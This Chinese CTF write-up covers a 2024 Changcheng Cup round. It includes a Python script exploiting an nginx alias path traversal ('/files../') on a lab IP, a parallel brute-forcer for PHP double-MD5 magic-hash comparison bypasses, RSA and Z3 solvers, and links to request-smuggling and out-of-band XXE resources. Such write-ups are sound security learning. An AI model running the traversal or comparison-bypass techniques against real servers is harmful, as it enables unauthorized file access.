2024长城杯初赛第三场WP及部分题目赛后学习

现在我要点名一个黑盒,全是登录框,谜语描述的比赛。

image.png

WEB

nginxfile

https://www.cnblogs.com/zpchcbd/p/12654984.html

配置错误添加别名
image.png
逆天,根本没见过,我太菜了。
然后就是脚本寻找/var/secret的尽头

1
2
3
4
5
6
7
8
9
10
11
12
import requests
from tqdm import trange

urla = "http://192.168.16.179:8002/files../var/secret1/secret2/secret3/secret4/secret5/secret6/secret7/secret8/secret9/secret10/secret11/secret12/secret13/secret14/secret15/secret16/secret17/secret18/secret19/secret20/secret21/secret22/secret23/secret24/secret25/secret26/secret27/secret28/secret29/secret30/secret31/secret32/secret33/secret34/secret35/secret36/secret37/secret38/secret39/secret40/secret41/secret42/secret43/secret44/secret45/secret46/secret47/secret48/secret49/secret50/secret51/secret52/secret53/secret54/secret55/secret56/secret57/secret58/secret59/secret60/secret61/secret62/secret63/secret64/secret65/secret66/secret67/secret68/secret69/secret70/secret71/secret72/secret73/secret74/secret75/secret76/secret77/secret78/secret79/secret80/secret81/secret82/secret83/secret84/secret85/secret86/secret87/secret88/secret89/secret90/secret91/secret92/secret93/secret94/secret95/secret96/secret97/secret98/secret99/secret100/secret101/secret102/secret103/secret104/secret105/secret106/secret107/secret108/secret109/secret110/secret111/secret112/secret113/secret114/secret115/secret116/secret117/secret118/secret119/secret120/secret121/secret122/secret123/secret124/secret125/secret126/secret127/secret128/secret129/secret130/secret131/secret132/secret133/secret134/secret135/secret136/secret137/secret138/secret139/secret140/secret141/secret142/secret143/secret144/secret145/secret146/secret147/secret148/secret149/secret150/secret151/secret152/secret153/secret154/secret155/secret156/secret157/secret158/secret159/secret160/secret161/secret162/secret163/secret164/secret165/secret166/secret167/secret168/secret169/secret170/secret171/secret172/secret173/secret174/secret175/secret176/secret177/secret178/secret179/secret180/secret181/secret182/secret183/secret184/secret185/secret186/secret187/secret188/secret189/secret190/secret191/secret192/secret193/secret194/secret195/secret196/secret197/secret198/secret199/secret200/secret201/secret202/secret203/secret204/secret205/secret206/secret207/secret208/secret209/secret210/secret211/secret212/secret213/secret214/secret215/secret216/secret217/secret218/secret219/secret220/secret221/secret222/secret223/secret224/secret225/secret226/secret227/secret228/secret229/secret230/secret231/secret232/secret233/secret234/secret235/secret236/secret237/secret238/secret239/secret240/secret241/secret242/secret243/secret244/secret245/secret246/secret247/secret248/secret249/secret250/secret251/secret252/secret253/secret254/secret255/secret256/secret257/secret258/secret259/secret260/secret261/secret262/secret263/secret264/secret265/secret266/secret267/secret268/secret269/secret270/secret271/secret272/secret273/secret274/secret275/secret276/secret277/secret278/secret279/secret280/secret281/secret282/secret283/secret284/secret285/secret286/secret287/secret288/secret289/secret290/secret291/secret292/secret293/secret294/secret295/secret296/secret297/secret298/secret299/"

for i in trange(1, 700):
    urla += "secret" + str(i) + '/'
    print(urla)
    res = requests.get(urla)
    if 'flag' in res.text:
        break
    print(res)

到300后返回状态就错误了。
就到300最后。

总结

这里其实犯蠢了,直接100、100拼接不就完了,到时候再微调,这样太浪费时间了。
而且前面那个之前也没遇见过。

hash and what (未出)

具体题目忘了,大概类似这个:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
//include 'hint.php';
error_reporting(0);

if (isset($_GET['a']) && isset($_GET['b']) && isset($_GET['c']) && isset($_GET['d'])) {
    if ($_GET['a'] != $_GET['b']  ) {
        echo 1;
        if (md5($_GET['a']) === md5($_GET['b'])){
            echo 2;
            if ($_GET['d'] == hash('md4',$_GET['d']) ){
                echo 3;
                // echo $_GET['c'];
                // echo "\n";
                // echo md5(md5($_GET['c']));
                if ($_GET['c'] == md5(md5($_GET['c']))){
                    echo 4;
                   // echo $hint;
                }
            }
        }
    }else{
        echo 'Wrong!';
    }
}else{
    show_source(__FILE__);
}
?>

前几个都没啥,最后这个c这里卡了很久,脚本一直没出来,爆破的时候一直出问题。
如果单线程这里至少要半个多小时。
这里用cpu多线程重新搞一个脚本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
@Project : Python 
@File    : 多线程MD5计算
@desc    : 
@Author  : @Natro92
@Date    : 2024/4/1 下午2:23 
@Blog    : https://natro92.fun
@Contact : natro92@natro92.fun
"""
import hashlib
import multiprocessing

from tqdm import tqdm


def is_magic_hash(md5_hash):
    return md5_hash.startswith('0e') and md5_hash[2:].isdigit()


def check_magic_hash(j):
    random_string = '0e' + str(j)
    md5_once = hashlib.md5(random_string.encode('utf-8')).hexdigest()
    md5_twice = hashlib.md5(md5_once.encode('utf-8')).hexdigest()
    if is_magic_hash(md5_twice):
        return random_string, md5_once, md5_twice
    else:
        return None


def worker_init():
    # print(f"Process {multiprocessing.current_process().name} started")
    pass


def find_magic_hashes(cpus_to_use, start, end):
    # * 注意:ranges改为从传入的start开始,到end结束
    ranges = range(start, end)
    pbar = tqdm(total=end - start)
    found_magic_hash = False

    def update(*a):
        pbar.update()

    with multiprocessing.Pool(cpus_to_use, initializer=worker_init) as pool:
        for result in pool.imap_unordered(check_magic_hash, ranges, chunksize=10000):
            update()
            if result is not None:
                tqdm.write(f"Found magic hash! {result[0]} => {result[1]} => {result[2]}")
                found_magic_hash = True
                # * 如果找到,退出循环
                break

    pbar.close()
    return found_magic_hash


if __name__ == '__main__':
    cpus_to_use = multiprocessing.cpu_count()
    start = 0
    end = 10000000

    while not find_magic_hashes(cpus_to_use, start, end):
        tqdm.write(f"[*] Processed from {start} to {end}")
        start = end
        end += 10000000

    print("已完成!")

image.png
这里是结果:0e1138100474
这里我的笔记本爆破速度大概是6s/10000000,这里用实验室电脑跑的,3s/10000000,跑出来大概用了5min。
后面听说是一个反序列化,没看到题。

总结

之前的类型基本都直接上网上找就能找到结果、再不济几分钟就能爆破出来,但是这个如果用单线程需要挺久时间。比赛的时候还不会用python的多线程,只会异步,这里学到了。
但是即使如此也改变不了它的题的烂😓。

CRYPTO

NormalRSA

http://www.hiencode.com/pub_asys.html 读取公钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
2062175026715261437251115412763083482865084247140319742062762463
4995641445264611301521536394494222306763722460243604532087804596
3432728830519031374468077063917444848749465641735931200001426223
5594470359998447338296049806048891022382254041324480871431224423
5115271360890728119312050221054304224094425401105613861305013563
5514914058484817318899241087559790939706200854074183590691515211
4453356716063452277874957192087392607913854176530832611484138217
5052307472122163146240196121035096483713942342665052475556933935
3882669182278859893320203427019949490782166083869543333080393630
0604578686078819366973524207408949604343502434711860525904962100
1327230673967595302433625181686605594786528098202718607801030192
4940151039925932146355741745220174035940054038306022026228754431
1370133442080810786279849782886778349636485793830572795447926288
9562215186039812208961157944153847667741946574776559918179497703
0756721895322782152304598423467273338216669283325523339549713431
4463878844587655972981011487725896688961503814722391229828902820
3488466463162267754958689409484898706404559934123043284971567725
0864743824756212644614677498812628671839186669992576236988819357
0077831538329160205902202652064968188663233653297177256124327883
7804579164761873982701072229548260362895897175683450182134223930
2186854370700144885242918872352977360003344941616571112523070870
0603583238413046540341798055437204310139701321689529339705216775
1542665730166593979774386291641308772888852080245934262055011545
6222167216263637510436436727915159622990255542874401237224391491
2014587205781634801565763289779322445409267365171052120922122481
0118747827968189052429492509290693652292202416403871346427335546
648614804149133552945105363241107403

分解

写脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import gmpy2
from Crypto.Util.number import *

e = 65537
c = open(r"D:\CacheForAll\Wechat\WeChat Files\wxid_1n5qjy5wqiq222\FileStorage\File\2024-03\normalrsa\cipher.txt", "rb")
c1 = c.read()
c = bytes_to_long(c1)
q = 108082147276398906822234149167480016132157014049560913761488880190018027488520386318253742675423286348552334110023434741671427911613197684395221211646299519273129194692306445874938199068586137486874290442314459278649345469626426790676801658394799404284116771456479272808343825651929906737811050557836671896732124546721747709022607151231423494815945385193624295868730390462068156825588342737037490320356361648437686599733
n = 20621750267152614372511154127630834828650842471403197420627624634995641445264611301521536394494222306763722460243604532087804596343272883051903137446807706391744484874946564173593120000142622355944703599984473382960498060488910223822540413244808714312244235115271360890728119312050221054304224094425401105613861305013563551491405848481731889924108755979093970620085407418359069151521144533567160634522778749571920873926079138541765308326114841382175052307472122163146240196121035096483713942342665052475556933935388266918227885989332020342701994949078216608386954333308039363006045786860788193669735242074089496043435024347118605259049621001327230673967595302433625181686605594786528098202718607801030192494015103992593214635574174522017403594005403830602202622875443113701334420808107862798497828867783496364857938305727954479262889562215186039812208961157944153847667741946574776559918179497703075672189532278215230459842346727333821666928332552333954971343144638788445876559729810114877258966889615038147223912298289028203488466463162267754958689409484898706404559934123043284971567725086474382475621264461467749881262867183918666999257623698881935700778315383291602059022026520649681886632336532971772561243278837804579164761873982701072229548260362895897175683450182134223930218685437070014488524291887235297736000334494161657111252307087006035832384130465403417980554372043101397013216895293397052167751542665730166593979774386291641308772888852080245934262055011545622216721626363751043643672791515962299025554287440123722439149120145872057816348015657632897793224454092673651710521209221224810118747827968189052429492509290693652292202416403871346427335546648614804149133552945105363241107403
p = n // q
d = int(gmpy2.invert(e, (p - 1) * (q - 1)))
m = pow(c, d, n)
print(m)
print(long_to_bytes(m))

image.png

总结

刚开始看这个的时候犯蠢了,前两天装office全家桶的时候装上了publisher,我以为是misc的隐写进去。实际上是公钥,根本没看这个。

MISC

绝不服输

image.png
upload 执行命令,有个压缩包:
image.png
image.png
hex数据转出得到zip文件夹。
image.png
还有一个图片上面是密码。
解压得到flag。

总结

最开始看到upload追踪流没找到,好久没做misc了,wireshark不会用了😓。

RE

ZE

不是我做的

Z3直接梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
"""
用Z3解出v5的值
v4 = [0x00004F17, 0x00009CF6, 0x00008DDB, 0x00008EA6, 0x00006929, 0x00009911, 0x000040A2, 0x00002F3E, 0x000062B6, 0x00004B82, 0x0000486C, 0x00004002, 0x000052D7, 0x00002DEF, 0x000028DC, 0x0000640D, 0x0000528F, 0x0000613B, 0x00004781, 0x00006B17, 0x00003237, 0x00002A93, 0x0000615F, 0x000050BE, 0x0000598E, 0x00004656, 0x00005B31, 0x0000313A, 0x00003010, 0x000067FE, 0x00004D5F, 0x000058DB, 0x00003799, 0x000060A0, 0x00002750, 0x00003759, 0x00008953, 0x00007122, 0x000081F9, 0x00005524, 0x00008971, 0x00003A1D]
"""
from z3 import *
v5 = [BitVec("v5_%d" % i, 8) for i in range(42)]
v4 = [0x00004F17, 0x00009CF6, 0x00008DDB, 0x00008EA6, 0x00006929, 0x00009911, 0x000040A2, 0x00002F3E, 0x000062B6, 0x00004B82, 0x0000486C, 0x00004002, 0x000052D7, 0x00002DEF, 0x000028DC, 0x0000640D, 0x0000528F, 0x0000613B, 0x00004781, 0x00006B17, 0x00003237, 0x00002A93, 0x0000615F, 0x000050BE, 0x0000598E, 0x00004656, 0x00005B31, 0x0000313A, 0x00003010, 0x000067FE, 0x00004D5F, 0x000058DB, 0x00003799, 0x000060A0, 0x00002750, 0x00003759, 0x00008953, 0x00007122, 0x000081F9, 0x00005524, 0x00008971, 0x00003A1D]
s = Solver()
s.add(v4[0] == 34 * v5[3] + 12 * v5[0] + 53 * v5[1] + 6 * v5[2] + 58 * v5[4] + 36 * v5[5] + v5[6])
s.add(v4[1] == 27 * v5[4] + 73 * v5[3] + 12 * v5[2] + 83 * v5[0] + 85 * v5[1] + 96 * v5[5] + 52 * v5[6])
s.add(v4[2] == 24 * v5[2] + 78 * v5[0] + 53 * v5[1] + 36 * v5[3] + 86 * v5[4] + 25 * v5[5] + 46 * v5[6])
s.add(v4[3] == 78 * v5[1] + 39 * v5[0] + 52 * v5[2] + 9 * v5[3] + 62 * v5[4] + 37 * v5[5] + 84 * v5[6])
s.add(v4[4] == 48 * v5[4] + 14 * v5[2] + 23 * v5[0] + 6 * v5[1] + 74 * v5[3] + 12 * v5[5] + 83 * v5[6])
s.add(v4[5] == 15 * v5[5] + 48 * v5[4] + 92 * v5[2] + 85 * v5[1] + 27 * v5[0] + 42 * v5[3] + 72 * v5[6])
s.add(v4[6] == 26 * v5[5] + 67 * v5[3] + 6 * v5[1] + 4 * v5[0] + 3 * v5[2] + 68 * v5[6])
s.add(v4[7] == 34 * v5[10] + 12 * v5[7] + 53 * v5[8] + 6 * v5[9] + 58 * v5[11] + 36 * v5[12] + v5[13])
s.add(v4[8] == 27 * v5[11] + 73 * v5[10] + 12 * v5[9] + 83 * v5[7] + 85 * v5[8] + 96 * v5[12] + 52 * v5[13])
s.add(v4[9] == 24 * v5[9] + 78 * v5[7] + 53 * v5[8] + 36 * v5[10] + 86 * v5[11] + 25 * v5[12] + 46 * v5[13])
s.add(v4[10] == 78 * v5[8] + 39 * v5[7] + 52 * v5[9] + 9 * v5[10] + 62 * v5[11] + 37 * v5[12] + 84 * v5[13])
s.add(v4[11] == 48 * v5[11] + 14 * v5[9] + 23 * v5[7] + 6 * v5[8] + 74 * v5[10] + 12 * v5[12] + 83 * v5[13])
s.add(v4[12] == 15 * v5[12] + 48 * v5[11] + 92 * v5[9] + 85 * v5[8] + 27 * v5[7] + 42 * v5[10] + 72 * v5[13])
s.add(v4[13] == 26 * v5[12] + 67 * v5[10] + 6 * v5[8] + 4 * v5[7] + 3 * v5[9] + 68 * v5[13])
s.add(v4[14] == 34 * v5[17] + 12 * v5[14] + 53 * v5[15] + 6 * v5[16] + 58 * v5[18] + 36 * v5[19] + v5[20])
s.add(v4[15] == 27 * v5[18] + 73 * v5[17] + 12 * v5[16] + 83 * v5[14] + 85 * v5[15] + 96 * v5[19] + 52 * v5[20])
s.add(v4[16] == 24 * v5[16] + 78 * v5[14] + 53 * v5[15] + 36 * v5[17] + 86 * v5[18] + 25 * v5[19] + 46 * v5[20])
s.add(v4[17] == 78 * v5[15] + 39 * v5[14] + 52 * v5[16] + 9 * v5[17] + 62 * v5[18] + 37 * v5[19] + 84 * v5[20])
s.add(v4[18] == 48 * v5[18] + 14 * v5[16] + 23 * v5[14] + 6 * v5[15] + 74 * v5[17] + 12 * v5[19] + 83 * v5[20])
s.add(v4[19] == 15 * v5[19] + 48 * v5[18] + 92 * v5[16] + 85 * v5[15] + 27 * v5[14] + 42 * v5[17] + 72 * v5[20])
s.add(v4[20] == 26 * v5[19] + 67 * v5[17] + 6 * v5[15] + 4 * v5[14] + 3 * v5[16] + 68 * v5[20])
s.add(v4[21] == 34 * v5[24] + 12 * v5[21] + 53 * v5[22] + 6 * v5[23] + 58 * v5[25] + 36 * v5[26] + v5[27])
s.add(v4[22] == 27 * v5[25] + 73 * v5[24] + 12 * v5[23] + 83 * v5[21] + 85 * v5[22] + 96 * v5[26] + 52 * v5[27])
s.add(v4[23] == 24 * v5[23] + 78 * v5[21] + 53 * v5[22] + 36 * v5[24] + 86 * v5[25] + 25 * v5[26] + 46 * v5[27])
s.add(v4[24] == 78 * v5[22] + 39 * v5[21] + 52 * v5[23] + 9 * v5[24] + 62 * v5[25] + 37 * v5[26] + 84 * v5[27])
s.add(v4[25] == 48 * v5[25] + 14 * v5[23] + 23 * v5[21] + 6 * v5[22] + 74 * v5[24] + 12 * v5[26] + 83 * v5[27])
s.add(v4[26] == 15 * v5[26] + 48 * v5[25] + 92 * v5[23] + 85 * v5[22] + 27 * v5[21] + 42 * v5[24] + 72 * v5[27])
s.add(v4[27] == 26 * v5[26] + 67 * v5[24] + 6 * v5[22] + 4 * v5[21] + 3 * v5[23] + 68 * v5[27])
s.add(v4[28] == 34 * v5[31] + 12 * v5[28] + 53 * v5[29] + 6 * v5[30] + 58 * v5[32] + 36 * v5[33] + v5[34])
s.add(v4[29] == 27 * v5[32] + 73 * v5[31] + 12 * v5[30] + 83 * v5[28] + 85 * v5[29] + 96 * v5[33] + 52 * v5[34])
s.add(v4[30] == 24 * v5[30] + 78 * v5[28] + 53 * v5[29] + 36 * v5[31] + 86 * v5[32] + 25 * v5[33] + 46 * v5[34])
s.add(v4[31] == 78 * v5[29] + 39 * v5[28] + 52 * v5[30] + 9 * v5[31] + 62 * v5[32] + 37 * v5[33] + 84 * v5[34])
s.add(v4[32] == 48 * v5[32] + 14 * v5[30] + 23 * v5[28] + 6 * v5[29] + 74 * v5[31] + 12 * v5[33] + 83 * v5[34])
s.add(v4[33] == 15 * v5[33] + 48 * v5[32] + 92 * v5[30] + 85 * v5[29] + 27 * v5[28] + 42 * v5[31] + 72 * v5[34])
s.add(v4[34] == 26 * v5[33] + 67 * v5[31] + 6 * v5[29] + 4 * v5[28] + 3 * v5[30] + 68 * v5[34])
s.add(v4[35] == 34 * v5[38] + 12 * v5[35] + 53 * v5[36] + 6 * v5[37] + 58 * v5[39] + 36 * v5[40] + v5[41])
s.add(v4[36] == 27 * v5[39] + 73 * v5[38] + 12 * v5[37] + 83 * v5[35] + 85 * v5[36] + 96 * v5[40] + 52 * v5[41])
s.add(v4[37] == 24 * v5[37] + 78 * v5[35] + 53 * v5[36] + 36 * v5[38] + 86 * v5[39] + 25 * v5[40] + 46 * v5[41])
s.add(v4[38] == 78 * v5[36] + 39 * v5[35] + 52 * v5[37] + 9 * v5[38] + 62 * v5[39] + 37 * v5[40] + 84 * v5[41])
s.add(v4[39] == 48 * v5[39] + 14 * v5[37] + 23 * v5[35] + 6 * v5[36] + 74 * v5[38] + 12 * v5[40] + 83 * v5[41])
s.add(v4[40] == 15 * v5[40] + 48 * v5[39] + 92 * v5[37] + 85 * v5[36] + 27 * v5[35] + 42 * v5[38] + 72 * v5[41])
s.add(v4[41] == 26 * v5[40] + 67 * v5[38] + 6 * v5[36] + 4 * v5[35] + 3 * v5[37] + 68 * v5[41])

assert s.check() == sat
m = s.model()
print("".join([chr(m[v5[i]].as_long()) for i in range(42)]))

flag{7e171d43-63b9-4e18-990e-6e14c2afe648}

最后

WEB除了那俩我记得还有一个AdminLTE,弱口令登录进去,然后估计是找某个后台cve。
还有一个是gunicorn请求走私漏洞。这个Yakit没法切换显示\r\n没做。等有时间搞一下

https://zhuanlan.zhihu.com/p/643981358 http请求走私
https://github.com/anshumanpattnaik/http-request-smuggling 请求走私工具
https://blog.csdn.net/xiru9972/article/details/128342729 gunicorn走私漏洞

phpinfo那个不知道是什么,我以为是pearcmd,但是没有文件上传入口。还有一个签到XXE,没回显,常规读文件也不行,看看过段时间能不能找个wp看看。

http://www.nanhack.com/payload/xxe/xxe2.php xxe外带
https://www.cnblogs.com/17bdw/p/10098181.html#_label1 xxe

说实话,打之前看了第一二场的难度,比这简单多了。没合计第二天突然升难度了,队内pwn手也差一点出一个,要不然应该稳了的。第四第五场之后难度又下去了😓。
群u说是原题,但是我怎么一个没找到。这段时间比赛比较多,重心要转回CTF了。😵